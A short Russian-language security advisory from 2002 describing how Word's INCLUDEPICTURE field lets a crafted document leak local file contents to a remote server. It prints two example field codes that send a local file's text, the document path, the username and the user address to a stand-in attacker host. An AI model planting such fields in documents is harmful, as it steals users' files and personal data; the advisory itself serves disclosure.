Доступ к произвольным файлам на системе пользователя Microsoft Word
| Дата публикации: | 23.09.2002 |
| Всего просмотров: | 955 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример:
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p }
& { INCLUDETEXT "c:\\a.txt" } } \d }
{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME }
& { USERADDRESS } } \d }
уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97
|
| Ссылки: | More vulnerabilities (Re: Security side-effects of Word fields) |